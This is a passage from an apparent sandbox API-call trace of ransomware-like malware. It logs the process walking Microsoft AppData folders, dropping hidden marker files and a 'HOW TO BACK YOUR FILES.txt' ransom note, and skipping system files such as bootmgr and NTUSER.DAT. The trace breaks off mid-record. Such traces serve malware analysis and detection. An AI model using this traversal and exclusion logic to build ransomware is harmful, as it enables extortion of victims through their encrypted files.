returned 1 [0053.094] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.095] CloseHandle (hObject=0x27c) returned 1 [0053.095] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs") returned 57 [0053.095] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.095] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8923b24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe8923b24, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xe8f6e2f4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0053.095] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.095] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.095] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.095] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.095] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8923b24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe8923b24, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xe8f6e2f4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.095] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.095] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.095] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.095] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.095] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.095] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8f6e2f4, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8f6e2f4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8f94503, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.096] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.096] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.096] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8f6e2f4, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8f6e2f4, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8f94503, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0053.096] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0053.096] lstrcpyW (in: lpString1=0x130ebac, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.096] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\inputmethod\\chs\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.096] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.097] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.097] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.097] CloseHandle (hObject=0x278) returned 1 [0053.097] CloseHandle (hObject=0x27c) returned 1 [0053.097] GetCurrentThreadId () returned 0xd98 [0053.097] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0053.097] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel" [0053.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11c988 | out: hHeap=0xe0000) returned 1 [0053.097] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0053.097] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel" [0053.097] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\" [0053.097] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\.BFC0E91B00AE8A0620D3" [0053.097] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\excel\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.098] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.101] FlushFileBuffers (hFile=0x27c) returned 1 [0053.102] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.102] CloseHandle (hObject=0x27c) returned 1 [0053.102] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel") returned 47 [0053.102] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.102] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x208e9b07, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x12e96cf, ftLastAccessTime.dwHighDateTime=0x1d327c7, ftLastWriteTime.dwLowDateTime=0xe8f94503, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0053.102] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.102] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.102] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.102] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.103] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x208e9b07, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x12e96cf, ftLastAccessTime.dwHighDateTime=0x1d327c7, ftLastWriteTime.dwLowDateTime=0xe8f94503, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.103] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.103] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.103] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.103] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.103] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.103] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8f94503, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8f94503, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8f94503, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.103] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.103] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.103] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12e96cf, ftCreationTime.dwHighDateTime=0x1d327c7, ftLastAccessTime.dwLowDateTime=0x12e96cf, ftLastAccessTime.dwHighDateTime=0x1d327c7, ftLastWriteTime.dwLowDateTime=0x12e96cf, ftLastWriteTime.dwHighDateTime=0x1d327c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0053.103] lstrcmpiW (lpString1="XLSTART", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.103] lstrcmpiW (lpString1="XLSTART", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.103] lstrcmpiW (lpString1="XLSTART", lpString2="Rabbit4444.exe") returned 1 [0053.103] lstrcmpiW (lpString1="XLSTART", lpString2=".") returned 1 [0053.103] lstrcmpiW (lpString1="XLSTART", lpString2="..") returned 1 [0053.103] lstrcmpiW (lpString1="XLSTART", lpString2="windows") returned 1 [0053.103] lstrcmpiW (lpString1="XLSTART", lpString2="bootmgr") returned 1 [0053.103] lstrcmpiW (lpString1="XLSTART", lpString2="pagefile.sys") returned 1 [0053.103] lstrcmpiW (lpString1="XLSTART", lpString2="boot") returned 1 [0053.103] lstrcmpiW (lpString1="XLSTART", lpString2="ids.txt") returned 1 [0053.103] lstrcmpiW (lpString1="XLSTART", lpString2="NTUSER.DAT") returned 1 [0053.103] lstrcpyW (in: lpString1=0x130eb98, lpString2="XLSTART" | out: lpString1="XLSTART") returned="XLSTART" [0053.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6388 [0053.103] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x70) returned 0x117950 [0053.103] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6390 | out: ListHead=0xf68b0, ListEntry=0xf6390) returned 0xf6450 [0053.103] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12e96cf, ftCreationTime.dwHighDateTime=0x1d327c7, ftLastAccessTime.dwLowDateTime=0x12e96cf, ftLastAccessTime.dwHighDateTime=0x1d327c7, ftLastWriteTime.dwLowDateTime=0x12e96cf, ftLastWriteTime.dwHighDateTime=0x1d327c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 0 [0053.103] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0053.103] lstrcpyW (in: lpString1=0x130eb98, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.103] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\excel\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.104] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.104] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.104] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.104] CloseHandle (hObject=0x278) returned 1 [0053.104] CloseHandle (hObject=0x27c) returned 1 [0053.104] GetCurrentThreadId () returned 0xd98 [0053.105] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0053.105] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0053.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0053.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0053.105] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0053.105] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\" [0053.105] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\.BFC0E91B00AE8A0620D3" [0053.105] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\excel\\xlstart\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.106] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.109] FlushFileBuffers (hFile=0x27c) returned 1 [0053.110] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.110] CloseHandle (hObject=0x27c) returned 1 [0053.111] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned 55 [0053.111] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.111] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12e96cf, ftCreationTime.dwHighDateTime=0x1d327c7, ftLastAccessTime.dwLowDateTime=0x12e96cf, ftLastAccessTime.dwHighDateTime=0x1d327c7, ftLastWriteTime.dwLowDateTime=0xe8f94503, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0053.111] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.111] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.111] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.111] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.111] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12e96cf, ftCreationTime.dwHighDateTime=0x1d327c7, ftLastAccessTime.dwLowDateTime=0x12e96cf, ftLastAccessTime.dwHighDateTime=0x1d327c7, ftLastWriteTime.dwLowDateTime=0xe8f94503, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.111] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.111] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.111] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.111] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.111] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.111] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8f94503, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8f94503, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8fba773, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0053.111] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.111] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0053.111] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8f94503, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8f94503, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8fba773, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0053.111] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0053.111] lstrcpyW (in: lpString1=0x130eba8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0053.111] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\excel\\xlstart\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0053.112] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0053.112] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0053.113] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.113] CloseHandle (hObject=0x278) returned 1 [0053.113] CloseHandle (hObject=0x27c) returned 1 [0053.113] GetCurrentThreadId () returned 0xd98 [0053.113] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6450 [0053.113] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0053.113] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105a00 | out: hHeap=0xe0000) returned 1 [0053.113] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6448 | out: hHeap=0xe0000) returned 1 [0053.113] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0053.113] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\" [0053.113] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\.BFC0E91B00AE8A0620D3" [0053.113] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0053.114] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0053.117] FlushFileBuffers (hFile=0x27c) returned 1 [0053.117] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0053.118] CloseHandle (hObject=0x27c) returned 1 [0053.118] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned 66 [0053.118] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0053.118] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32ff935, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8fba773, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0053.118] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.119] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.119] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0053.119] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0053.119] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x32ff935, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3325b84, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0xe8fba773, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0053.119] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0053.119] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0053.119] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0053.119] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0053.119] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0053.119] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe8fba773, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe8fba773, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe8fba773, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, 